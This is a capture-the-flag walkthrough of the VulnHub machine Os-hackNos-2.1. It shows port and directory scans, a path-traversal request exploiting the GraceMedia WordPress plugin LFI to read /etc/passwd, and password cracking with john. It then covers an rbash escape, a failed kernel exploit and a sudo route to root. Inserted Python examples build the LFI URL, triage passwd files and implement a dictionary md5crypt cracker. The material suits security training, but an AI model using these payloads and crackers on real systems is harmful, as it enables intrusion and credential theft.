OS-HACKNOS-2.1

2022-04-04 01:03:03




Download: hackNos: Os-hackNos-2.1 ~ VulnHub

1 Information gathering

1.1 Port scan

$ nmap -A -p - -T4 192.168.56.103 -oA OS-HACKNOS-2.1
Nmap scan report for 192.168.56.103
Host is up (0.00042s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:36:4e:71:6a:83:e2:c1:1e:a9:52:64:45:f6:29:80 (RSA)
|   256 b4:ce:5a:c3:3f:40:52:a6:ef:dc:d8:29:f3:2c:b5:d1 (ECDSA)
|_  256 09:6c:17:a1:a3:b4:c7:78:b9:ad:ec:de:8f:64:b1:7b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1.2 Directory scan

$ dirsearch -x403 -u http://192.168.56.103/
Target: http://192.168.56.103/

[22:21:48] Starting: 
[22:22:16] 200 -   11KB - /index.html
[22:22:34] 301 -  316B  - /tsweb  ->  http://192.168.56.103/tsweb/
[22:22:35] 200 -   43KB - /tsweb/

Task Completed

# scan the /tsweb/ directory found above
$ dirsearch -u http://192.168.56.103/tsweb/
Target: http://192.168.56.103/tsweb/

[22:35:36] Starting: 
[22:35:51] 301 -    0B  - /tsweb/index.php  ->  http://192.168.56.103/tsweb/
[22:35:52] 200 -   19KB - /tsweb/license.txt
[22:35:57] 200 -    7KB - /tsweb/readme.html
[22:36:03] 301 -  325B  - /tsweb/wp-admin  ->  http://192.168.56.103/tsweb/wp-admin/
[22:36:03] 400 -    1B  - /tsweb/wp-admin/admin-ajax.php
[22:36:03] 302 -    0B  - /tsweb/wp-admin/  ->  http://192.168.56.103/tsweb/wp-login.php?redirect_to=http%3A%2F%2F192.168.56.103%2Ftsweb%2Fwp-admin%2F&reauth=1
[22:36:03] 500 -    3KB - /tsweb/wp-admin/setup-config.php
[22:36:03] 301 -  327B  - /tsweb/wp-content  ->  http://192.168.56.103/tsweb/wp-content/
[22:36:03] 200 -    0B  - /tsweb/wp-config.php
[22:36:03] 200 -    1KB - /tsweb/wp-admin/install.php
[22:36:03] 200 -    0B  - /tsweb/wp-content/
[22:36:03] 200 -   69B  - /tsweb/wp-content/plugins/akismet/akismet.php
[22:36:03] 500 -    0B  - /tsweb/wp-content/plugins/hello.php
[22:36:03] 200 -    1KB - /tsweb/wp-content/uploads/
[22:36:03] 200 -  796B  - /tsweb/wp-content/upgrade/
[22:36:03] 301 -  328B  - /tsweb/wp-includes  ->  http://192.168.56.103/tsweb/wp-includes/
[22:36:03] 200 -    0B  - /tsweb/wp-cron.php
[22:36:03] 500 -    0B  - /tsweb/wp-includes/rss-functions.php
[22:36:03] 302 -    0B  - /tsweb/wp-signup.php  ->  http://192.168.56.103/tsweb/wp-login.php?action=register
[22:36:03] 200 -    6KB - /tsweb/wp-login.php
[22:36:03] 200 -   45KB - /tsweb/wp-includes/
[22:36:04] 405 -   42B  - /tsweb/xmlrpc.php

Task Completed

1.2.1 Directory analysis

  1. http://192.168.56.103/tsweb/ (the original shows a screenshot of the site here; the wp-admin, wp-content and wp-login.php paths returned by dirsearch identify it as a WordPress install)


1.2.2 WPScan

$ wpscan --url http://192.168.56.103/tsweb/ -e vp --api-token Yourapi
 | [!] 1 vulnerability identified:
 |
 | [!] Title: GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
 |     References:
 |      - https://wpscan.com/vulnerability/a4f5b10f-3386-45cc-9548-dd7bbea199d6
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
 |      - https://www.exploit-db.com/exploits/46537/
 |      - https://seclists.org/fulldisclosure/2019/Mar/26
  1. The scan shows that the GraceMedia Media Player 1.0 plugin installed on the target is affected by a local file inclusion vulnerability (CVE-2019-9618).

2 Exploiting WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion

  1. The exploit-db entry (WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion - PHP webapps Exploit, exploit-db.com) gives the proof of concept:

    Local File Inclusion POC:
    
    GET
    /wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
    
  2. Requesting http://192.168.56.103/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd against the target confirms the vulnerability. The interesting line is the last one: the account named flag keeps an md5crypt hash in the world-readable /etc/passwd instead of the usual x that defers to /etc/shadow, and its login shell is the restricted /bin/rbash:

    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
    systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
    syslog:x:102:106::/home/syslog:/usr/sbin/nologin
    messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
    _apt:x:104:65534::/nonexistent:/usr/sbin/nologin
    lxd:x:105:65534::/var/lib/lxd/:/bin/false
    uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
    dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
    landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
    pollinate:x:109:1::/var/cache/pollinate:/bin/false
    sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
    rohit:x:1000:1000:hackNos:/home/rohit:/bin/bash
    mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
    flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash
    
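Added example (not from the original write-up): a small Python helper that builds the GraceMedia LFI URL shown above and triages the /etc/passwd it returns, pulling out accounts whose password field holds a real hash (crackable, because /etc/passwd is world-readable), accounts with an interactive shell, and accounts stuck in a restricted shell such as rbash. The function names (lfi_url, triage_passwd, john_lines) are this example's own, and SAMPLE_PASSWD is a constructed subset of the listing above so the script runs offline; fetch() is the only part that touches the network and is not called by default.

```python
# Added example: build the GraceMedia LFI request and triage the /etc/passwd it returns.
from collections import namedtuple
from urllib.parse import urlencode
from urllib.request import urlopen

# Vulnerable endpoint from the exploit-db PoC: the cfg parameter is included
# without sanitisation, so a traversal prefix reaches arbitrary files.
PLUGIN_ENDPOINT = "wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"


def lfi_url(base_url, target="/etc/passwd", depth=10):
    """Return the LFI URL for `target` under a WordPress install at base_url."""
    payload = "../" * depth + target.lstrip("/")
    query = urlencode({"ajaxAction": "getIds", "cfg": payload}, safe="/")
    return f"{base_url.rstrip('/')}/{PLUGIN_ENDPOINT}?{query}"


def fetch(url, timeout=10):
    """Fetch a URL and return the body as text (only used against the lab box)."""
    with urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


PasswdEntry = namedtuple("PasswdEntry", "name passwd uid gid gecos home shell")


def parse_passwd(text):
    """Parse /etc/passwd text into entries, skipping malformed lines."""
    entries = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7:
            continue
        entries.append(PasswdEntry(*fields))
    return entries


def triage_passwd(text):
    """Pick out what matters for the next step of the attack.

    hashes:     accounts whose password field is a crypt(3) hash instead of 'x'
    login:      accounts with an interactive shell (SSH / su targets)
    restricted: login accounts whose shell is a restricted shell such as rbash
    """
    entries = parse_passwd(text)
    hashes = {e.name: e.passwd for e in entries if e.passwd.startswith("$")}
    login = [e.name for e in entries if e.shell.endswith("sh")]
    restricted = [
        e.name for e in entries
        if e.shell.endswith("sh") and e.shell.rsplit("/", 1)[-1].startswith("r")
    ]
    return {"hashes": hashes, "login": login, "restricted": restricted}


def john_lines(hashes):
    """Format name:hash pairs the way john and hashcat expect them."""
    return [f"{name}:{h}" for name, h in hashes.items()]


# Constructed sample: a subset of the /etc/passwd listing shown above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
rohit:x:1000:1000:hackNos:/home/rohit:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash
"""

if __name__ == "__main__":
    print(lfi_url("http://192.168.56.103/tsweb/"))
    # On the lab box: report = triage_passwd(fetch(lfi_url("http://192.168.56.103/tsweb/")))
    report = triage_passwd(SAMPLE_PASSWD)
    print("login shells:", report["login"])
    print("restricted shells:", report["restricted"])
    for line in john_lines(report["hashes"]):
        print("crackable:", line)
```

The hash check keys on the password field starting with `$`; a locked account shows `*` or `!`, and a correctly configured one shows `x`, so anything else in that field is a finding in itself, independent of whether it cracks.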

2.1 Cracking the flag user's password

$ cat passwd
$1$flag$vqjCxzjtRc7PofLYS2lWf/

$ john --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt passwd
topsecret        (?)     

2.2 GetShell

# log in with flag:topsecret
$ ssh flag@192.168.56.103
flag@hacknos:/$ 

2.3 Upgrading to a full shell

# flag's login shell is /bin/rbash (see the /etc/passwd listing above); spawning
# /bin/bash from python3 gives an unrestricted, fully interactive TTY
python3 -c "import pty;pty.spawn('/bin/bash')"

2.4 Checking for privilege-escalation vulnerabilities

flag@hacknos:/tmp/linux-exploit-suggester-1.1$ ./linux-exploit-suggester.sh 

Possible Exploits:

cat: write error: Broken pipe
[+] [CVE-2018-18955] subuid_shell

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
   Exposure: probable
   Tags: [ ubuntu=18.04 ]{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28}
   Download URL: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip
   Comments: CONFIG_USER_NS needs to be enabled

3 Privilege escalation

3.1 Trying CVE-2018-18955

  1. Download the exploit: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip

  2. Compile it on Kali:

    $ gcc subshell.c -o subshell
    $ gcc subuid_shell.c -o subuid_shell
    
  3. Copy the binaries to the target

    flag@hacknos:/tmp$ scp kali@192.168.56.102:/home/kali/45886/subshell .
    flag@hacknos:/tmp$ scp kali@192.168.56.102:/home/kali/45886/subuid_shell .
    
    
  4. Running the exploit fails. newuidmap refuses the mapping because the flag user has no subordinate uid range in /etc/subuid covering [0,1000), and subshell's direct write to uid_map fails as well, since an unprivileged process may only map its own uid without newuidmap's help. The user-namespace primitive the exploit depends on is simply not available to this account:

    flag@hacknos:/tmp$ cat /etc/shadow
    cat: /etc/shadow: Permission denied
    flag@hacknos:/tmp$ ./subuid_shell 
    newuidmap: uid range [0-1000) -> [100000-101000) not allowed
    subuid_shell: newuidmap failed
    flag@hacknos:/tmp$ ./subshell 
    subshell: write uid map: Operation not permitted
    subshell: read from sock: Success
    flag@hacknos:/tmp$ id
    uid=1001(flag) gid=1003(flag) groups=1003(flag)
    
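Added example (not from the original write-up): before compiling and uploading the CVE-2018-18955 binaries it is worth checking the preconditions the failure above exposes. The PoC asks newuidmap for a single mapping of 1000 ids, so the user needs one /etc/subuid (and /etc/subgid) range with a count of at least 1000, and the kernel must allow unprivileged user namespaces. The function names, the 1000-id threshold taken from the error message, and SAMPLE_SUBUID are this example's own; precheck() reads the real files on the box it runs on.

```python
# Added example: decide up front whether the CVE-2018-18955 PoC can work for this user.
import getpass


def subid_ranges(subid_text, user):
    """Return the (start, count) ranges /etc/subuid or /etc/subgid grants `user`."""
    ranges = []
    for line in subid_text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 3 or fields[0] != user:
            continue
        try:
            ranges.append((int(fields[1]), int(fields[2])))
        except ValueError:
            continue  # malformed entry; newuidmap ignores it too
    return ranges


def can_map(subid_text, user, needed=1000):
    """True if a single granted range can hold `needed` consecutive ids.

    The PoC passes one mapping of 1000 ids to newuidmap, so two smaller
    ranges do not add up; it needs one range with count >= needed.
    """
    return any(count >= needed for _, count in subid_ranges(subid_text, user))


def read_sysctl(path):
    """Read a /proc/sys toggle, returning None where the kernel does not expose it."""
    try:
        with open(path) as f:
            return f.read().strip()
    except OSError:
        return None


def precheck(user=None, subuid_path="/etc/subuid", subgid_path="/etc/subgid"):
    """Collect the preconditions the exploit relies on into one dict."""
    user = user or getpass.getuser()

    def load(path):
        try:
            with open(path) as f:
                return f.read()
        except OSError:
            return ""  # missing file means no ranges for anyone

    return {
        "user": user,
        "subuid_ok": can_map(load(subuid_path), user),
        "subgid_ok": can_map(load(subgid_path), user),
        # Debian/Ubuntu-specific toggle; absent on other distributions
        "unprivileged_userns_clone": read_sysctl("/proc/sys/kernel/unprivileged_userns_clone"),
        "max_user_namespaces": read_sysctl("/proc/sys/user/max_user_namespaces"),
    }


# Constructed sample /etc/subuid: rohit has a full range, bob a range that is
# too small for the PoC, and flag no entry at all.
SAMPLE_SUBUID = "rohit:100000:65536\nbob:200000:500\n"

if __name__ == "__main__":
    for name in ("rohit", "bob", "flag"):
        print(name, "can map 1000 ids:", can_map(SAMPLE_SUBUID, name))
    print(precheck())
```

If subuid_ok is False for the current user, the newuidmap-based stage of the exploit cannot succeed no matter what the kernel version is, and the time is better spent on local enumeration, which is what the next section does.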

3.2 Local enumeration

  1. Look for unusual files; /var/backups holds a password backup:

    flag@hacknos:/var/backups$ ls
    apt.extended_states.0  apt.extended_states.1.gz  passbkp
    flag@hacknos:/var/backups$ cat passbkp/md5-hash 
    $1$rohit$01Dl0NQKtgfeL08fGrggi0
    
  2. Files owned by the flag user: nothing

    flag@hacknos:/$ find / -user flag 2>/dev/null | egrep -v "/proc" 
    
  3. Binaries with file capabilities

    flag@hacknos:/$ getcap -r / 2>/dev/null
    /usr/bin/mtr-packet = cap_net_raw+ep
    
  4. SUID binaries: nothing unusual

    flag@hacknos:/$ find / -perm -u=s 2>/dev/null 
    

3.3 Switching user

  1. Crack the hash from /var/backups/passbkp/md5-hash (the salt rohit suggests whose password it is):

    $ cat passwd
    $1$rohit$01Dl0NQKtgfeL08fGrggi0
    
    $ john --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt passwd
    !%hack41         (?)     
    
  2. su to rohit succeeds

    flag@hacknos:/var/www/html/tsweb$ su - rohit
    Password: 
    rohit@hacknos:~$
    
  3. rohit's groups: besides sudo, rohit is in lxd, which is a well-known route to root in its own right, but the sudo membership makes that unnecessary here

    rohit@hacknos:~$ id
    uid=1000(rohit) gid=1000(rohit) groups=1000(rohit),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
    
  4. rohit's sudo rights: unrestricted

    rohit@hacknos:~$ sudo -l
    [sudo] password for rohit: 
    Matching Defaults entries for rohit on hacknos:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    
    User rohit may run the following commands on hacknos:
        (ALL : ALL) ALL
    
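Added example (not from the original write-up) covering both hash-cracking steps, 2.1 and 3.3 step 1: a pure-Python md5crypt, the $1$ scheme both hashes use, with a verify and a dictionary-attack helper, so the hash leaked through /etc/passwd and the one in /var/backups/passbkp/md5-hash can be checked without john. The function names are this example's own, and WORDLIST is a constructed stand-in for rockyou.txt containing the two passwords the write-up recovered.

```python
# Added example: md5crypt ($1$) in pure Python plus a dictionary attack over a wordlist.
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, n):
    """md5crypt's own base-64: n characters, least significant 6 bits first."""
    out = []
    for _ in range(n):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def md5crypt(password, salt):
    """FreeBSD/glibc md5crypt: 1000 MD5 rounds with the classic mixing schedule."""
    pw = password.encode()
    salt = salt.encode()[:8]  # only the first 8 salt bytes are used
    ctx = hashlib.md5(pw + b"$1$" + salt)
    alt = hashlib.md5(pw + salt + pw).digest()
    # Append len(pw) bytes of the alternate digest, repeating it as needed
    for i in range(len(pw), 0, -16):
        ctx.update(alt[: min(16, i)])
    # Per bit of len(pw): a NUL byte for a set bit, the first password byte otherwise
    i = len(pw)
    while i:
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    # Stretching: 1000 rounds whose input order depends on the round number
    for i in range(1000):
        ctx1 = hashlib.md5()
        ctx1.update(pw if i & 1 else final)
        if i % 3:
            ctx1.update(salt)
        if i % 7:
            ctx1.update(pw)
        ctx1.update(final if i & 1 else pw)
        final = ctx1.digest()
    # Permuted base-64 of the 16-byte result
    groups = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    encoded = "".join(
        _to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in groups
    )
    encoded += _to64(final[11], 2)
    return f"$1${salt.decode()}${encoded}"


def split_hash(h):
    """Return (salt, digest) from a $1$salt$digest string; reject other schemes."""
    parts = h.split("$")
    if len(parts) != 4 or parts[1] != "1":
        raise ValueError("not an md5crypt hash")
    return parts[2], parts[3]


def verify(password, h):
    """Constant-format check of one candidate against one hash."""
    salt, _ = split_hash(h)
    return md5crypt(password, salt) == h


def crack(h, wordlist):
    """Return the first candidate that reproduces `h`, or None."""
    salt, _ = split_hash(h)
    for candidate in wordlist:
        if md5crypt(candidate, salt) == h:
            return candidate
    return None


# Constructed stand-in for rockyou.txt.
WORDLIST = ["123456", "password", "topsecret", "hacknos", "!%hack41"]

# The two hashes found on the box: /etc/passwd (2.1) and /var/backups (3.3).
FLAG_HASH = "$1$flag$vqjCxzjtRc7PofLYS2lWf/"
ROHIT_HASH = "$1$rohit$01Dl0NQKtgfeL08fGrggi0"

if __name__ == "__main__":
    for name, h in (("flag", FLAG_HASH), ("rohit", ROHIT_HASH)):
        print(name, "->", crack(h, WORDLIST))
```

md5crypt has no configurable cost and only 1000 rounds of MD5, which is why a short wordlist run finishes instantly; the per-salt loop above is essentially what john does for --format=md5crypt, minus the optimisations.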

3.4 Root

rohit@hacknos:~$ sudo -i
root@hacknos:~# cat root.txt 
 _______                         __              __  __     #
/       \                       /  |            /  |/  |    #
$$$$$$$  |  ______    ______   _$$ |_          _$$ |$$ |_   #
$$ |__$$ | /      \  /      \ / $$   |        / $$  $$   |  #
$$    $$< /$$$$$$  |/$$$$$$  |$$$$$$/         $$$$$$$$$$/   #
$$$$$$$  |$$ |  $$ |$$ |  $$ |  $$ | __       / $$  $$   |  # 
$$ |  $$ |$$ \__$$ |$$ \__$$ |  $$ |/  |      $$$$$$$$$$/   #
$$ |  $$ |$$    $$/ $$    $$/   $$  $$/         $$ |$$ |    #
$$/   $$/  $$$$$$/   $$$$$$/     $$$$/          $$/ $$/     #
#############################################################                                                          
                                                          
#############################################################                                                          
MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b

Blog : www.hackNos.com

Author : Rahul Gehlaut

linkedin : https://www.linkedin.com/in/rahulgehlaut/
#############################################################
root@hacknos:~#

Source: https://www.cnblogs.com/f-carey/p/16098182.html
